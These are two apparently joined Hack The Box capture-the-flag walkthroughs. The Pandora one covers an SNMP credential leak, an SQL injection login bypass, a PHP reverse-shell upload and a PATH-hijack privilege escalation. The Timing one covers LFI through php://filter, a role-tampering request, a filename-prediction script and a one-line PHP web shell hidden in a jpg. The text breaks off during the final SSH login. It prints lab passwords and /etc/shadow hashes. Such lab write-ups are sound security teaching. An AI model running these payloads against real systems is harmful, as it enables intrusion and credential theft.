Scanning pandora.htb (10.10.11.136) [1000 ports]
Discovered open port 161/udp on 10.10.11.136
Completed UDP Scan at 11:56, 0.70s elapsed (1000 total ports)
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.10s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
2049/udp closed nfs
16503/udp closed unknown
19075/udp closed unknown
21655/udp closed unknown
54925/udp closed unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.94 seconds
Raw packets sent: 2028 (93.718KB) | Rcvd: 9 (772B)
┌─[puck@parrot-lt]─[~/htb/pandora]
We got one port(UDP 161) SNMP. Lets see what it has to offer. We run snmpwalk with the public community string.
public is default for most snmp servers and thats why I tried public first, if it doesn’t work, one might have to bruteforce the community string.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $snmpwalk -v 2c pandora.htb -c public
Snmpwalk gave us a bunch of details, but the most interesting one is the credentials of the user Daniel. Apparently there is a process running and the command of that includes the credentials for the user Daniel.
iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrig
ger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.837 = ""
iso.3.6.1.2.1.25.4.2.1.5.893 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.946 = ""
iso.3.6.1.2.1.25.4.2.1.5.948 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.951 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.3620 = ""
Let’s ssh into the box with the obtained credentials. The user “daniel” does not have a lot of privileges. Looking at /etc/passwd, there is one other user matt which might have privileges. Looking around the system, we see that alongwith the static website that we saw earlier, there is one another web app called pandora. But looking at the sites-enabled config, there seems to be no way to it. But making a curl request from the localhost(victim), shows something interesting.
It seems like only the localhost might have access to that website. Let’s create an ssh tunnel to port 80 so that we can view the website from our machine.
We can create an SSH tunnel to this service using
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora] └──╼ $sudo ssh -L 80:localhost:80 daniel@pandora.htb daniel@10.10.11.136's password:HotelBabylon23 Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon 24 Jan 15:07:49 UTC 2022 System load: 0.37 Processes: 259 Usage of /: 63.6% of 4.87GB Users logged in: 1 Memory usage: 18% IPv4 address for eth0: 10.10.11.136 Swap usage: 0% => /boot is using 91.8% of 219MB 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon Jan 24 15:06:04 2022 from 10.10.14.28 daniel@pandora:~$
The pandora console opens and asks for credentials.
Common login credentials like admin/admin, admin/password don’t work. Googling pandora gives us the information that it is a monitoring system. Moreover the version of the pandora is clearly visible on the bottom of the login page: v7.0NG.742. On searching for the exploit specific to this version we come across a very interesting article.
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
This article gives a detailed explanation of the underlying vulnerability. Using this sql injection we can bypass the login page and get admin access
https://github.com/zjicmDarkWing/CVE-2021-32099
and then visit http://127.0.0.1/pandora_console/
and you are logged on as admin
After logging in as admin, we snoop around a bit and see that there is a file upload options. It also seems like the system is written in php. So lets use the good old php-reverse-shell.
We upload the shell and set a listener at 9000 on our machine and navigate to the shell in our browser.
http://127.0.0.1/pandora_console/images/shell.php
Voila! We get a reverse shell with the user matt and we get user.txt. Great!!!
We generate ssh keys, so that we can login with ssh and not have to deal with the crappy shell.
After logging in, the first thing we do is obtain linpeas.sh onto the target system. Running linpeas gives some juicy info, but the most eye catching thing is a binary called pandora_backup with the SUID set.
Looking at the contents of the binary, we see that it is using tar to uncompress something from /root. Since tar is not being called with the absolute path, we can use PATH highjacking to obtain root.
matt@pandora:/$ file /usr/bin/pandora_backup
file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:/$ /usr/bin/pandora_backup
/usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
matt@pandora:/$
We create a local file tar, with contents “/bin/sh”, append the path to our PATH env variable and run the binary and we get root and out last flag inside /root
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora] └──╼ $ssh matt@pandora.htb -i id_rsa Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue 25 Jan 11:48:33 UTC 2022 System load: 0.27 Processes: 288 Usage of /: 63.4% of 4.87GB Users logged in: 1 Memory usage: 11% IPv4 address for eth0: 10.10.11.136 Swap usage: 0% => /boot is using 91.8% of 219MB 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. matt@pandora:~$ ls user.txt matt@pandora:~$ export PATH=/home/matt:$PATH matt@pandora:~$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client /home/matt/tar: 1: bin/bash: not found Backup failed! Check your permissions! matt@pandora:~$ echo $PATH /home/matt:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin matt@pandora:~$ cat tar bin/bash matt@pandora:~$ echo "/bin/bash" > tar matt@pandora:~$ cat tar /bin/bash matt@pandora:~$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client root@pandora:~# cd /root root@pandora:/root# ls root.txt root@pandora:/root# cat root.txt e50cb013f81c9bb1880dd795ffbaead8 root@pandora:/root# cat /etc/shadow\ > / cat: /etc/shadow/: Not a directory root@pandora:/root# cat /etc/shadow root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7::: daemon:*:18659:0:99999:7::: bin:*:18659:0:99999:7::: --snip--: sshd:*:18789:0:99999:7::: systemd-coredump:!!:18789:::::: matt:$6$JYpB9KogYA60PG6X$dU7jHpb3MIYYg0evztbE8Xw8dx7ok5/U0PaDT63FgQTwyJFr9DbaLa0WzeZGMFd05hrNCnoP5xTUr7Mkl2gNx1:18794:0:99999:7::: lxd:!:18789:::::: Debian-snmp:!:18789:0:99999:7::: mysql:!:18789:0:99999:7::: daniel:$6$f4POti4xJyVf3/yD$7/efpNYDq.baYycVczUb4b5LlEBNami3//4TbI6lPNK2MaWPrqbdvAhLdMrfHnnZATY59rLgr4DeEZ3U8S41l/:18964:0:99999:7::: root@pandora:/root#
Protected: htb-unicode-private
htb-timing-nl
Hackthebox Timing writeup
Introduction@Timing:~$
Column | Details |
---|---|
Name | Timing |
IP | 10.10.11.135 |
Points | 30 |
Os | Linux |
Difficulty | Medium |
Creator | irogir |
Out On | 11 Dec 2021 |
Brief@Timing :~$
Hackthebox release new machine called timing
, in this machine we need to first find LFI with some fuzzing
through LFI we need to dump the sorce code of file and get useful information
and get the admin panel through admin panel we will upload imges abusing that function to get RFI
and dump the git directory to find old password and get ssh session
after that abuse the netutils to overwrite the authorized_keys
.
Recon
Nmap
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ nmap -sC -sV -oA nmap/result 10.10.11.135
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-21 23:05 CST
Nmap scan report for 10.10.11.135
Host is up (0.091s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:5c:40:d7:c9:fe:ff:a8:83:c3:6e:cd:60:11:d2:eb (RSA)
| 256 18:c9:f7:b9:27:36:a1:16:59:23:35:84:34:31:b3:ad (ECDSA)
|_ 256 a2:2d:ee:db:4e:bf:f9:3f:8b:d4:cf:b4:12:d8:20:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Simple WebApp
|_Requested resource was ./login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.38 seconds
There are two ports open 22:ssh,80:http
Port-80
It’s a simple
login page.
Trying default username
password but nothing
work.
Let’s run gobuster
.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ gobuster dir -u http://10.10.11.135/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.135/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/12/21 23:22:09 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://10.10.11.135/images/]
/login.php (Status: 200) [Size: 5609]
/index.php (Status: 302) [Size: 0] [--> ./login.php]
/profile.php (Status: 302) [Size: 0] [--> ./login.php]
/image.php (Status: 200) [Size: 0]
/header.php (Status: 302) [Size: 0] [--> ./login.php]
/footer.php (Status: 200) [Size: 3937]
/upload.php (Status: 302) [Size: 0] [--> ./login.php]
/css (Status: 301) [Size: 310] [--> http://10.10.11.135/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.11.135/js/]
/logout.php (Status: 302) [Size: 0] [--> ./login.php]
All pages redirect to login.php
except /image
and image.php
.
Let’s first go to /images
Forbidden! let’s check image.php
And we see image.php
don’t give any error or redirect
. i think this page accept some get or post parameter
because when we upload any php
shell through images it’s also need parameter
and if we don’t pass any they give us blank
page like this.
Let’s find the parameter with wfuzz
.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ wfuzz -u http://10.10.11.135/image.php?FUZZ=/etc/passwd -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt -t 50 --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.11.135/image.php?FUZZ=/etc/passwd
Total requests: 2588
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000360: 200 0 L 3 W 25 Ch "img"
Total time: 8.155825
Processed Requests: 2588
Filtered Requests: 2587
Requests/sec.: 317.3192
Found the parameter
let’s check if it has LFI
or not.
┌─[puck@parrot-lt]─[~/htb/timing]
└──╼ $curl http://10.10.11.135/image.php?img=/etc/passwd | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--100 25 100 25 0 0 137 0 --:--:-- --:--:-- --:--:-- 137
Hacking attempt detected!
┌─[puck@parrot-lt]─[~/htb/timing]
And it’s said hacking attempt detected!
Let’s use php base64
filter to check if it’s still the same scenario
.
http://10.10.11.135/image.php?img=php://filter/convert.base64-decoder/resource=/etc/passwd
And it’s works!
┌─[puck@parrot-lt]─[~/htb/timing]
└──╼ $curl http://10.10.11.135/image.php?img=php://filter/convert.base64-decoder/resource=/etc/passwd | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--100 1614 100 1614 0 0 8819 0 --:--:-- --:--:-- --:--:-- 8819
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
x:4:65534:sync:/bin:/bin/sync
--snip--
pollinate:x:109:1::/var/cache/pollinate:/bin/
false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111:114:MySQL
Server,,,:/nonexistent:/bin/false aaron:x:1000:1000:aaron:/home/aaron:/bin/bash
┌─[puck@parrot-lt]─[~/htb/timing]
└──╼ $
Got aaron user inside /etc/passwd
file.
Let’s check the login.php
file with LFI.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=login.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2764 100 2764 0 0 15885 0 --:--:-- --:--:-- --:--:-- 15885
<?php
include "header.php";
function createTimeChannel()
{
sleep(1);
}
include "db_conn.php";
if (isset($_SESSION['userid'])){
header('Location: ./index.php');
die();
}
if (isset($_GET['login'])) {
$username = $_POST['user'];
$password = $_POST['password'];
$statement = $pdo->prepare("SELECT * FROM users WHERE username = :username");
$result = $statement->execute(array('username' => $username));
$user = $statement->fetch();
if ($user !== false) {
createTimeChannel();
if (password_verify($password, $user['password'])) {
$_SESSION['userid'] = $user['id'];
$_SESSION['role'] = $user['role'];
header('Location: ./index.php');
return;
}
}
$errorMessage = "Invalid username or password entered";
}
?>
<?php
if (isset($errorMessage)) {
?>
<div class="container-fluid">
<div class="row">
<div class="col-md-10 col-md-offset-1">
<div class="alert alert-danger alert-dismissible fade in text-center" role="alert"><strong>
<?php echo $errorMessage; ?>
</div>
</div>
</div>
</div>
<?php
}
?>
<link rel="stylesheet" href="./css/login.css">
<div class="wrapper fadeInDown">
<div id="formContent">
<div class="fadeIn first" style="padding: 20px">
<img src="./images/user-icon.png" width="100" height="100"/>
</div>
<form action="?login=true" method="POST">
<input type="text" id="login" class="fadeIn second" name="user" placeholder="login">
<input type="text" id="password" class="fadeIn third" name="password" placeholder="password">
<input type="submit" class="fadeIn fourth" value="Log In">
</form>
<!-- todo -->
<div id="formFooter">
<a class="underlineHover" href="#">Forgot Password?</a>
</div>
</div>
</div>
<?php
include "footer.php";
If you look at the login.php
file it’s include db file called db_conn.php
.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=db_conn.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 124 100 124 0 0 720 0 --:--:-- --:--:-- --:--:-- 720
<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
Got the database
password but i try this on login
page and ssh through aaron
but nothing work.
Let’s check the upload.php
file which we found in gobuster
result.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=upload.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1360 100 1360 0 0 8095 0 --:--:-- --:--:-- --:--:-- 8095
<?php
include("admin_auth_check.php");
$upload_dir = "images/uploads/";
if (!file_exists($upload_dir)) {
mkdir($upload_dir, 0777, true);
}
$file_hash = uniqid();
$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
$target_file = $upload_dir . $file_name;
$error = "";
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
if (isset($_POST["submit"])) {
$check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
if ($check === false) {
$error = "Invalid file";
}
}
// Check if file already exists
if (file_exists($target_file)) {
$error = "Sorry, file already exists.";
}
if ($imageFileType != "jpg") {
$error = "This extension is not allowed.";
}
if (empty($error)) {
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "The file has been uploaded.";
} else {
echo "Error: There was an error uploading your file.";
}
} else {
echo "Error: " . $error;
}
?>
Before uploading it’s checking on admin_auth_check.php
let’s check that file first
.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=admin_auth_check.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 268 100 268 0 0 1558 0 --:--:-- --:--:-- --:--:-- 1549
<?php
include_once "auth_check.php";
if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
echo "No permission to access this panel!";
header('Location: ./index.php');
die();
}
?>
It’s checking
that if our session role id
is equal to 1 or not if not it’s redirect
to index.php.
But the question
is what’s the username and password
of login page? after some time i try username aaron
and password is also aaron and it’s work
.
And it’s said user 2
but we need our role id = 1
for that we need to find
a way let’s check the edit profile
tab.
Let’s check the source code of profile.php
with that LFI
.
it’s submit the form
with help of js
.
It’s sending
the form data to profile_update.php
.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=js/profile.js | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 852 100 852 0 0 5011 0 --:--:-- --:--:-- --:--:-- 5041
function updateProfile() {
var xml = new XMLHttpRequest();
xml.onreadystatechange = function () {
if (xml.readyState == 4 && xml.status == 200) {
document.getElementById("alert-profile-update").style.display = "block"
}
};
xml.open("POST", "profile_update.php", true);
xml.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xml.send("firstName=" + document.getElementById("firstName").value + "&lastName=" + document.getElementById("lastName").value + "&email=" + document.getElementById("email").value + "&company=" + document.getElementById("company").value);
}
Let’s check the profile_update.php
file.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=profile_update.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2320 100 2320 0 0 12888 0 --:--:-- --:--:-- --:--:-- 12888
<?php
include "auth_check.php";
$error = "";
if (empty($_POST['firstName'])) {
$error = 'First Name is required.';
} else if (empty($_POST['lastName'])) {
$error = 'Last Name is required.';
} else if (empty($_POST['email'])) {
$error = 'Email is required.';
} else if (empty($_POST['company'])) {
$error = 'Company is required.';
}
if (!empty($error)) {
die("Error updating profile, reason: " . $error);
} else {
include "db_conn.php";
$id = $_SESSION['userid'];
$statement = $pdo->prepare("SELECT * FROM users WHERE id = :id");
$result = $statement->execute(array('id' => $id));
$user = $statement->fetch();
if ($user !== false) {
ini_set('display_errors', '1');
ini_set('display_startup_errors', '1');
error_reporting(E_ALL);
$firstName = $_POST['firstName'];
$lastName = $_POST['lastName'];
$email = $_POST['email'];
$company = $_POST['company'];
$role = $user['role'];
if (isset($_POST['role'])) {
$role = $_POST['role'];
$_SESSION['role'] = $role;
}
// dont persist role
$sql = "UPDATE users SET firstName='$firstName', lastName='$lastName', email='$email', company='$company' WHERE id=$id";
$stmt = $pdo->prepare($sql);
$stmt->execute();
$statement = $pdo->prepare("SELECT * FROM users WHERE id = :id");
$result = $statement->execute(array('id' => $id));
$user = $statement->fetch();
// but return it to avoid confusion
$user['role'] = $role;
$user['6'] = $role;
echo json_encode($user, JSON_PRETTY_PRINT);
} else {
echo "No user with this id was found.";
}
}
?>
And we see if we specify role=1
in the profile update
form. it’s set the session role id=1
.
Now let’s submit
the form and intercept
the req in burp.
Add the &role=1
in last and send
the req.Now go to the home
page or reload
the page.
And we see a new link
appear Admin Panel
let’s go to that page.
And we see we can upload
avatar image now let’s check the source code of upload.php
page.
And we see the process of uploading
file
1. it’s check if it is jpg
or not
2. it’s create a file name with md5
hash
3. inside md5 function
it’s using $file_hash which interpreted
as string because it’s using single
cot rather than double cot you can read
about that more in article
4. but the time function is return dynamic
value
5. and then the file_name
Link
: What is the difference between single-quoted and double-quoted strings in PHP?
Now to get the name
of the file i create a python
script to get that.
Exploit.py
import time
import hashlib
while True:
print(f"hash = {hashlib.md5('$file_hash'.encode()+str(int(time.time())).encode()).hexdigest()}")
time.sleep(1)
Now let’s create a jpg
file which has php code inside
that.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[/home/dedsec/Downloads/www]
└──╼ [★]$ cat dedsec.jpg
<?php system($_GET[dedsec]);?>
Before uploading
the file start the python
script first.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ python3 exploit.py
Now upload
the file.
Now check every single
hash which generated by python
script and try to send the req
with that hash with curl
.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/11c9776e30e9f474734c1aab85f1102a_dedsec.jpg&dedsec=id'
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/8303d2315176ef5e4f8d27db11525ee2_dedsec.jpg&dedsec=id'
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/dc1c96720db5b676ce16744ded6b6482_dedsec.jpg&dedsec=id'
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/b4a4cc1422fd48eb3ea2a4b14e9086e4_dedsec.jpg&dedsec=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
And we got the RCE
But the problem
is we can’t get the rev shell
back because of ip table
rules.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/b4a4cc1422fd48eb3ea2a4b14e9086e4_dedsec.jpg&dedsec=ls'
admin_auth_check.php
auth_check.php
avatar_uploader.php
css
db_conn.php
footer.php
header.php
image.php
images
index.php
js
login.php
logout.php
profile.php
profile_update.php
upload.php
After some enumeration
i find a zip file called source-files-backup.zip
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/b4a4cc1422fd48eb3ea2a4b14e9086e4_dedsec.jpg&dedsec=ls+-al+/opt/'
total 624
drwxr-xr-x 2 root root 4096 Dec 2 11:19 .
drwxr-xr-x 24 root root 4096 Nov 29 01:34 ..
-rw-r--r-- 1 root root 627851 Jul 20 22:36 source-files-backup.zip
I copy that zip file in /var/www/html
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ curl 'http://10.10.11.135/image.php?img=images/uploads/b4a4cc1422fd48eb3ea2a4b14e9086e4_dedsec.jpg&dedsec=cp+/opt/source-files-backup.zip+/var/www/html/'
Now download
that zip file.
Let’s unzip
the file.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www]
└──╼ [★]$ ls -al
total 616
drwxr-xr-x 1 root root 46 Dec 22 01:08 .
drwxr-xr-x 1 root root 54 Dec 22 01:08 ..
-rw-r--r-- 1 dedsec dedsec 627851 Dec 22 01:07 source-files-backup.zip
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www]
└──╼ [★]$ unzip source-files-backup.zip
And we see there .git
directory let’s dump all commits
in the background.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www]
└──╼ [★]$ ls -al backup/
total 52
drwxr-xr-x 1 root root 350 Jul 20 17:34 .
drwxr-xr-x 1 root root 74 Dec 22 01:12 ..
-rw-r--r-- 1 root root 200 Jul 20 17:34 admin_auth_check.php
-rw-r--r-- 1 root root 373 Jul 20 17:34 auth_check.php
-rw-r--r-- 1 root root 1268 Jul 20 17:34 avatar_uploader.php
drwxr-xr-x 1 root root 52 Jul 20 17:34 css
-rw-r--r-- 1 root root 92 Jul 20 17:34 db_conn.php
-rw-r--r-- 1 root root 3937 Jul 20 17:34 footer.php
drwxr-xr-x 1 root root 144 Jul 20 17:35 .git
-rw-r--r-- 1 root root 1498 Jul 20 17:34 header.php
-rw-r--r-- 1 root root 507 Jul 20 17:34 image.php
drwxr-xr-x 1 root root 68 Jul 20 17:34 images
-rw-r--r-- 1 root root 188 Jul 20 17:34 index.php
drwxr-xr-x 1 root root 114 Jul 20 17:34 js
-rw-r--r-- 1 root root 2074 Jul 20 17:34 login.php
-rw-r--r-- 1 root root 113 Jul 20 17:34 logout.php
-rw-r--r-- 1 root root 3041 Jul 20 17:34 profile.php
-rw-r--r-- 1 root root 1740 Jul 20 17:34 profile_update.php
-rw-r--r-- 1 root root 984 Jul 20 17:34 upload.php
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www]
└──╼ [★]$ /opt/GitTools/Extractor/extractor.sh backup/ git_dump/
And there is db_conn.php
file which has same password
which we found in LFI
.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www/backup]
└──╼ [★]$ ls -al
total 52
drwxr-xr-x 1 root root 350 Jul 20 17:34 .
drwxr-xr-x 1 root root 74 Dec 22 01:12 ..
-rw-r--r-- 1 root root 200 Jul 20 17:34 admin_auth_check.php
-rw-r--r-- 1 root root 373 Jul 20 17:34 auth_check.php
-rw-r--r-- 1 root root 1268 Jul 20 17:34 avatar_uploader.php
drwxr-xr-x 1 root root 52 Jul 20 17:34 css
-rw-r--r-- 1 root root 92 Jul 20 17:34 db_conn.php
-rw-r--r-- 1 root root 3937 Jul 20 17:34 footer.php
drwxr-xr-x 1 root root 144 Jul 20 17:35 .git
-rw-r--r-- 1 root root 1498 Jul 20 17:34 header.php
-rw-r--r-- 1 root root 507 Jul 20 17:34 image.php
drwxr-xr-x 1 root root 68 Jul 20 17:34 images
-rw-r--r-- 1 root root 188 Jul 20 17:34 index.php
drwxr-xr-x 1 root root 114 Jul 20 17:34 js
-rw-r--r-- 1 root root 2074 Jul 20 17:34 login.php
-rw-r--r-- 1 root root 113 Jul 20 17:34 logout.php
-rw-r--r-- 1 root root 3041 Jul 20 17:34 profile.php
-rw-r--r-- 1 root root 1740 Jul 20 17:34 profile_update.php
-rw-r--r-- 1 root root 984 Jul 20 17:34 upload.php
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www/backup]
└──╼ [★]$ cat db_conn.php
<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
Let’s check the git commits
which we dump in the background
.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www/git_dump]
└──╼ [★]$ ls -al
total 0
drwxr-xr-x 1 root root 168 Dec 22 01:12 .
drwxr-xr-x 1 root root 74 Dec 22 01:12 ..
drwxr-xr-x 1 root root 372 Dec 22 01:12 0-16de2698b5b122c93461298eab730d00273bd83e
drwxr-xr-x 1 root root 372 Dec 22 01:12 1-e4e214696159a25c69812571c8214d2bf8736a3f
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www/git_dump]
└──╼ [★]$ cat 0-16de2698b5b122c93461298eab730d00273bd83e/db_conn.php && cat 1-e4e214696159a25c69812571c8214d2bf8736a3f/db_conn.php
<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', 'S3cr3t_unGu3ss4bl3_p422w0Rd');
And we got the different
password let’s try this password with ssh
.
And we got the user.txt
file.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing/www/git_dump]
└──╼ [★]$ ssh aaron@10.10.11.135
The authenticity of host '10.10.11.135 (10.10.11.135)' can't be established.
ECDSA key fingerprint is SHA256:w5P4pFdNqpvCcxxisM5OCJz7a6chyDUrd1JQ14k5smY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.135' (ECDSA) to the list of known hosts.
aaron@10.10.11.135's password: S3cr3t_unGu3ss4bl3_p422w0Rd
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)
* Documentation: https://help.ubuntu.com
